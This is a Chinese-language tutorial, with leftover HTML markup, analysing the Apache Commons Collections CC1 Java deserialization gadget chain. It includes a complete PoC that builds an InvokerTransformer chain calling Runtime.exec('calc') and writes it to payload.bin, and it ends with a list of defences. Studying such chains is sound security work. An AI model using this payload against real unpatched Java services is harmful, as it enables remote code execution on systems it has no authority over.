Apache Commons Collections CC1 反序列化漏洞分析与利用<\/h1>

1. 漏洞概述<\/h2>

Apache Commons Collections 反序列化漏洞（CC1）是一个经典的 Java 反序列化安全漏洞，允许攻击者通过精心构造的序列化数据在目标系统上执行任意代码。<\/p>

核心利用机制<\/strong>：通过 TransformedMap<\/code> 或 LazyMap<\/code> 触发 InvokerTransformer<\/code> 的反射调用，最终通过 Runtime.exec()<\/code> 执行系统命令。<\/p>

影响版本<\/strong>：<\/p>

JDK版本：小于 1.8.0_8u71<\/li> Commons Collections：3.2.1 及以下版本<\/li> <\/ul> 2. 环境准备<\/h2> 2.1 所需组件<\/h3> JDK<\/strong>：jdk-8u65（下载地址<\/a>）<\/li> Commons Collections<\/strong>：3.2.1（下载地址<\/a>）<\/li> <\/ul> 2.2 Maven 依赖配置<\/h3> <dependencies><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>commons-collections<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>commons-collections<\/artifactId><\/span> <\/span><\/span> <version><\/span>3.2.1<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span><\/dependencies><\/span> <\/span><\/span><\/code><\/pre>3. 漏洞原理分析<\/h2> 3.1 整体利用链<\/h3> AnnotationInvocationHandler.readObject() → AbstractMapEntryDecorator.setValue() → TransformedMap.checkSetValue() → ChainedTransformer.transform() → InvokerTransformer.transform() → Runtime.getRuntime().exec() <\/code><\/pre> 3.2 核心组件分析<\/h3> 3.2.1 InvokerTransformer 类<\/h4> InvokerTransformer<\/code> 是漏洞利用的关键，它通过 Java 反射机制动态调用任意类的方法。<\/p> 关键代码分析<\/strong>：<\/p> public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span> <\/span><\/span> Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>iMethodName,<\/span> iParamTypes);<\/span> <\/span><\/span> return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> iArgs);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>构造函数<\/strong>：<\/p> public<\/span> InvokerTransformer<\/span>(<\/span>String methodName,<\/span> Class[]<\/span> paramTypes,<\/span> Object[]<\/span> args)<\/span> {<\/span> <\/span><\/span> super<\/span>();<\/span> <\/span><\/span> iMethodName =<\/span> methodName;<\/span> <\/span><\/span> iParamTypes =<\/span> paramTypes;<\/span> <\/span><\/span> iArgs =<\/span> args;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>利用示例<\/strong>：<\/p> InvokerTransformer invokerTransformer =<\/span> new<\/span> InvokerTransformer(<\/span> <\/span><\/span> "exec"<\/span>,<\/span> \/\/ 方法名 <\/span><\/span><\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> \/\/ 参数类型 <\/span><\/span><\/span><\/span> new<\/span> Object[]{<\/span>"calc"<\/span>}<\/span> \/\/ 参数值 <\/span><\/span><\/span><\/span>);<\/span> <\/span><\/span>invokerTransformer.<\/span>transform<\/span>(<\/span>Runtime.<\/span>getRuntime<\/span>());<\/span> <\/span><\/span><\/code><\/pre>3.2.2 TransformedMap 类<\/h4> TransformedMap<\/code> 是一个装饰器，用于对 Map 的键值进行转换操作。<\/p> 关键属性<\/strong>：<\/p> protected<\/span> final<\/span> Transformer keyTransformer;<\/span> <\/span><\/span>protected<\/span> final<\/span> Transformer valueTransformer;<\/span> <\/span><\/span><\/code><\/pre>关键方法<\/strong>：<\/p> protected<\/span> Object checkSetValue<\/span>(<\/span>Object value)<\/span> {<\/span> <\/span><\/span> return<\/span> valueTransformer.<\/span>transform<\/span>(<\/span>value);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>创建方法<\/strong>：<\/p> public<\/span> static<\/span> Map decorate<\/span>(<\/span>Map map,<\/span> Transformer keyTransformer,<\/span> Transformer valueTransformer)<\/span> {<\/span> <\/span><\/span> return<\/span> new<\/span> TransformedMap(<\/span>map,<\/span> keyTransformer,<\/span> valueTransformer);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3.2.3 AnnotationInvocationHandler 类<\/h4> 这是反序列化的入口点，其 readObject()<\/code> 方法会触发整个利用链。<\/p> 关键代码片段<\/strong>：<\/p> for<\/span> (<\/span>Map.<\/span>Entry<\/span><<\/span>String,<\/span> Object><\/span> memberValue :<\/span> memberValues.<\/span>entrySet<\/span>())<\/span> {<\/span> <\/span><\/span> String name =<\/span> memberValue.<\/span>getKey<\/span>();<\/span> <\/span><\/span> Class<?><\/span> memberType =<\/span> memberTypes.<\/span>get<\/span>(<\/span>name);<\/span> <\/span><\/span> if<\/span> (<\/span>memberType !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> Object value =<\/span> memberValue.<\/span>getValue<\/span>();<\/span> <\/span><\/span> if<\/span> (!(<\/span>memberType.<\/span>isInstance<\/span>(<\/span>value)<\/span> ||<\/span> value instanceof<\/span> ExceptionProxy))<\/span> {<\/span> <\/span><\/span> memberValue.<\/span>setValue<\/span>(<\/span>new<\/span> AnnotationTypeMismatchExceptionProxy(<\/span> <\/span><\/span> value.<\/span>getClass<\/span>()<\/span> +<\/span> "["<\/span> +<\/span> value +<\/span> "]"<\/span>).<\/span>setMember<\/span>(<\/span> <\/span><\/span> annotationType.<\/span>members<\/span>().<\/span>get<\/span>(<\/span>name)));<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>4. 漏洞利用详解<\/h2> 4.1 利用链构造<\/h3> 4.1.1 反射调用链构造<\/h4> 需要通过多个 Transformer 组合完成反射调用：<\/p> ChainedTransformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span> <\/span><\/span>});<\/span> <\/span><\/span><\/code><\/pre>4.1.2 触发链构造<\/h4> HashMap<<\/span>Object,<\/span>Object><\/span> map =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span>map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "aa"<\/span>);<\/span> \/\/ key 必须为 "value" <\/span><\/span><\/span><\/span>Map<<\/span>Object,<\/span>Object><\/span> transformedMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> chain);<\/span> <\/span><\/span><\/code><\/pre>4.2 反序列化触发<\/h3> 4.2.1 获取 AnnotationInvocationHandler<\/h4> Class<?><\/span> clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span> <\/span><\/span>Constructor<?><\/span> constructor =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span> <\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span><\/code><\/pre>4.2.2 创建恶意对象<\/h4> Object handler =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> transformedMap);<\/span> <\/span><\/span><\/code><\/pre>4.2.3 序列化与反序列化<\/h4> \/\/ 序列化 <\/span><\/span><\/span><\/span>ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"payload.bin"<\/span>));<\/span> <\/span><\/span>oos.<\/span>writeObject<\/span>(<\/span>handler);<\/span> <\/span><\/span>oos.<\/span>close<\/span>();<\/span> <\/span><\/span> <\/span><\/span>\/\/ 反序列化触发 <\/span><\/span><\/span><\/span>ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"payload.bin"<\/span>));<\/span> <\/span><\/span>ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span>ois.<\/span>close<\/span>();<\/span> <\/span><\/span><\/code><\/pre>5. 完整 PoC 代码<\/h2> import<\/span> org.apache.commons.collections.Transformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.ChainedTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.ConstantTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.InvokerTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.map.TransformedMap;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> java.io.*;<\/span> <\/span><\/span>import<\/span> java.lang.annotation.Target;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span> <\/span><\/span>import<\/span> java.util.HashMap;<\/span> <\/span><\/span>import<\/span> java.util.Map;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> CC1Poc<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 构造 Transformer 链 <\/span><\/span><\/span><\/span> ChainedTransformer chain =<\/span> new<\/span> ChainedTransformer(<\/span>new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span> <\/span><\/span> });<\/span> <\/span><\/span> <\/span><\/span> \/\/ 创建 TransformedMap <\/span><\/span><\/span><\/span> HashMap<<\/span>Object,<\/span>Object><\/span> map =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span> map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "aa"<\/span>);<\/span> <\/span><\/span> Map<<\/span>Object,<\/span>Object><\/span> transformedMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> chain);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 通过反射创建 AnnotationInvocationHandler <\/span><\/span><\/span><\/span> Class<?><\/span> clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span> <\/span><\/span> Constructor<?><\/span> constructor =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span> <\/span><\/span> constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> Object handler =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> transformedMap);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 序列化 <\/span><\/span><\/span><\/span> ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"payload.bin"<\/span>));<\/span> <\/span><\/span> oos.<\/span>writeObject<\/span>(<\/span>handler);<\/span> <\/span><\/span> oos.<\/span>close<\/span>();<\/span> <\/span><\/span> <\/span><\/span> \/\/ 反序列化触发 <\/span><\/span><\/span><\/span> ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"payload.bin"<\/span>));<\/span> <\/span><\/span> ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span> ois.<\/span>close<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>6. 关键注意事项<\/h2> JDK 版本限制<\/strong>：该漏洞仅在 JDK 8u71 之前的版本中有效<\/li> Key 值要求<\/strong>：Map 的 key 必须为 "value"，对应 Target 注解的方法名<\/li> 序列化要求<\/strong>：Runtime 类未实现 Serializable 接口，必须通过反射链获取<\/li> 访问权限<\/strong>：需要设置 setAccessible(true)<\/code> 来访问非公开的构造方法<\/li> <\/ol> 7. 防御措施<\/h2> 升级 Commons Collections 到最新版本<\/li> 升级 JDK 到 8u71 或更高版本<\/li> 使用反序列化过滤器限制可反序列化的类<\/li> 对输入流进行严格验证和过滤<\/li> <\/ol> 8. 总结<\/h2> CC1 反序列化漏洞是一个典型的 Java 安全漏洞，通过巧妙的利用 Java 反射机制和 Commons Collections 的特性，实现了从反序列化到任意代码执行的完整利用链。理解这个漏洞有助于深入掌握 Java 安全机制和反序列化漏洞的防御方法。<\/p> 该漏洞的分析展示了多个重要概念：<\/p> Java 反射机制的安全 implications<\/li> 装饰器模式在安全漏洞中的利用<\/li> 反序列化漏洞的触发机制<\/li> 利用链的构造方法<\/li> <\/ul>